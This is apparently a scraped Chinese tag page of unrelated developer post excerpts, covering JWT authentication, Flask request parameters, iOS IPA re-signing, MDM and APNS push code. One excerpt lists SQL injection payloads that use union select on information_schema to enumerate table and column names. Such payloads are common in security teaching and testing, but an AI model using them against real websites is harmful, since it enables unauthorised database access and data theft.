payload

JWT认证

佐手、 提交于 2019-12-03 10:06:21
优点 """ 1) 服务器不要存储token,token交给每一个客户端自己存储,服务器压力小 2)服务器存储的是 签发和校验token 两段算法,签发认证的效率高 3)算法完成各集群服务器同步成本低,路由项目完成集群部署(适应高并发) """ 格式 """ 1) jwt token采用三段式:头部.载荷.签名 2)每一部分都是一个json字典加密形参的字符串 3)头部和载荷采用的是base64可逆加密(前台后台都可以解密) 4)签名采用hash256不可逆加密(后台校验采用碰撞校验) 5)各部分字典的内容: 头部:基础信息 - 公司信息、项目组信息、可逆加密采用的算法 载荷:有用但非私密的信息 - 用户可公开信息、过期时间 签名:头部+载荷+秘钥 不可逆加密后的结果 注:服务器jwt签名加密秘钥一定不能泄露 签发token:固定的头部信息加密.当前的登陆用户与过期时间加密.头部+载荷+秘钥生成不可逆加密 校验token:头部可校验也可以不校验,载荷校验出用户与过期时间,头部+载荷+秘钥完成碰撞检测校验token是否被篡改 """ drf-jwt插件 官网 https://github.com/jpadilla/django-rest-framework-jwt 安装 >: pip3 install djangorestframework-jwt 登录-签发token:api

How to pass a nested dictionary to Flask's GET request handler

匿名 (未验证) 提交于 2019-12-03 08:57:35
可以将文章内容翻译成中文,广告屏蔽插件可能会导致该功能失效(如失效,请关闭广告屏蔽插件后再试): 由 翻译 强力驱动 问题: I am trying to pass a nested dictionary as a parameter to a GET request, which is handled by a Flask worker. The whole setup is Nginx+Gunicorn+Flask. On the client, I am doing the following: import requests def find_cabin (): party = { 'People' : [{ 'Age' : 44 , 'Gender' : 'F' , 'Habits' : 'Smoking,Drinking' }, { 'Age' : 9 , 'Gender' : 'F' } , { 'Age' : 4 , 'Gender' : 'F' }, { 'Age' : 49 , 'Gender' : 'M' }], 'Vehicles' : [{ 'Make/Model' : 'Honda Civic' }, { 'Make/Model' : 'Toyota RAV4' }], 'Must Haves' :[ 'Deck' , 'Fireplace' ,

sql注入之payload

你说的曾经没有我的故事 提交于 2019-12-03 08:18:29
/* *GET,post *有返回 * */ 基于报错的SQL注入 1、获取字段数 ' order by 5 --+ 2、获取表名 0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+ select group_concat(table_name) from information_schema.tables where table_schema=database() 3、获取字段 0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+ select group_concat(column_name) form information_schema.columns where table_name='users' /* *GET,post *无返回,无报错, * */ 来源: https://www.cnblogs.com/jiersixi/p/11784769.html

iOS resign IPA from appstore with developer profile

匿名 (未验证) 提交于 2019-12-03 07:50:05
可以将文章内容翻译成中文,广告屏蔽插件可能会导致该功能失效(如失效,请关闭广告屏蔽插件后再试): 问题: I am trying to resign iOS app which I downloaded from appstore with my own certificate how to do it I am stuck in that . I am using OS X Yosemite This is what I did # ResignApp.sh # # # Created by Naveen P on 3/11/15. # IPA="/RnD/Dropbox\ 3.7.ipa " PROVISION="/RnD/iOSTeam_Provisioning_Profile_.mobileprovision" CERTIFICATE="iPhone Developer: ABCD " # must be in keychain # unzip the ipa unzip -q "$IPA" # remove the signature rm -rf Payload/*.app/_CodeSignature Payload/*.app/CodeResources # replace the provision cp "$PROVISION" Payload/*.app

Delivering MDM DeviceLock Payload

白昼怎懂夜的黑 提交于 2019-12-03 06:10:00
问题 We were able to get an response with Status as Idle after send the first payload as mdm:. Now we want to send a simple device lock payload. we followed the exact same process to send the payload but the response returned was blank. We are following the certificate use as follows: 1. On the MDM server, To send mdm commands we use MDM Vendors APNS certificate with identifier as com.apple.mgmt.myapp.(This identifier is set as topic in configuration profile). 2. In the configuration profile, we

RIG exploit kit:恶意活动分析报告——像大多数exploit kit一样,RIG会用被黑的网站和恶意广告进行流量分发

淺唱寂寞╮ 提交于 2019-12-03 05:10:18
RIG exploit kit:恶意活动分析报告 from: https://www.freebuf.com/articles/web/110835.html 在过去的几周里,我们曾撰文讨论过 Neutrino 和 Magnitude 的exploit kit。现在,我们来研究下RIG的exploit kit,看看它有什么特别的分发渠道和payload。 与其他同类的比较 像大多数exploit kit一样,RIG会用被黑的网站和恶意广告进行流量分发。但是,它也会借助较老的exploit进行辅助攻击。比如它使用的Flash exploit( CVE-2015-8651 )其实在2015年12月就打了 补丁 ,而其他的一些exploit kit可能会更倾向于使用 2016年4月 的发布的新exploit( CVE-2016-4117 )。 尽管攻击方式不算复杂,但是RIG仍然能通过一些恶意软件活动获得较大的流量。而那些利用被黑站点和恶意广告,重定向到RIG的流量,是通过服务端的302跳转机制,或者是通过客户端的iframe和JS脚本的跳转实现的。 不同的恶意软件活动中,可能会有不同类型的代表exploit kit,这也是恶意软件payload会出现多元化的成因。奇怪的是,在我们下面收集的RIG样本里,是没有勒索赎金软件(ransomware)的,而这通常是很多常规exploit

sql盲注脚本--python

孤者浪人 提交于 2019-12-03 04:09:08
1.布尔盲注--方便以后修改,难点仅仅在于使用二分法求name # 1.布尔盲注 # 页面有不同的响应word1,word2 # 可猜解数据库长度、个数、名字、表个数、表长度、名字、字段、 # 长度:length,order by # 个数:count # 名字:ascii,substr import requests import time from math import ceil class SqlInject(object): headers = { "headers":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" } data= {} @classmethod def judge(cls,url): if bool(SqlInject.data): result = None # print(result) else: result = requests.get(url=url,headers=SqlInject.headers,timeout=5).text return result def __init__(self,url,word1,word2): self.url =

iOS: config profile for mobile device management

送分小仙女□ 提交于 2019-12-03 03:13:35
问题 I am able to create and install(in iOS devices) general mobileconfig profile generated by iPhone configuration utility(IPCU) v3.5(289) in Mac OS 10.6.8. But when I am generating config profile for mobile device management, not able to install it in iOS devices. I want to know to set the identity which certificate should I use. I have iOS developer account and iOS Enterprise account.So I can create the required certificate. For identity section I tried using SCEP also, but no luck,so I want to

contiki netstack数据收发结构

匆匆过客 提交于 2019-12-03 02:41:49
摘要 本文介绍了contiki netstack的MAC层以下数据收发层次结构,并讨论如何移植新的无线器件做为contiki的无线收发器。 正文 contiki netstack的数据收发层级 Radio:主要完成物理层无线数据的收发和控制 Framer: 完成对数据帧的打包和解析 RDC: radio duty cycling, 周期性访问radio,主要为了减少功耗 MAC: 数据链路层 Netstack: 网络协议栈 contiki内各层级的配置与用处 contiki可以在contiki-conf.h中进行配置 #define NETSTACK_CONF_NETWORK rime_driver //使用rime协议栈 #define NETSTACK_CONF_MAC nullmac_driver //不使用mac层协议 #define NETSTACK_CONF_RDC contikimac_driver //使用contikimac rdc #define NETSTACK_CONF_FRAMER framer_nrf24 //使用nrf24的frame结构 #define NETSTACK_CONF_RADIO nrf24_radio_driver //使用nrf24做为无线器件 NETSTACK_CONF_RADIO 定义contiki

Push message doesn't send using with distributed certificate

匿名 (未验证) 提交于 2019-12-03 02:38:01
可以将文章内容翻译成中文,广告屏蔽插件可能会导致该功能失效(如失效,请关闭广告屏蔽插件后再试): 问题: I can send push notification with developer p12 file using with sandbox, but my application on the appstore, I use distribution certificate f12 file using with gateway.push.apple.com messages cannot reach to devices. Push notification service activated on distirbuted certificate, I checked on developer.apple.com, I'm also trying new device id. (not developer device id) How can i solve my problem? Could you help me? where is my wrong? My C# code like below: int port = 2195; String hostname = "gateway.push.apple.com"; String certificatePath =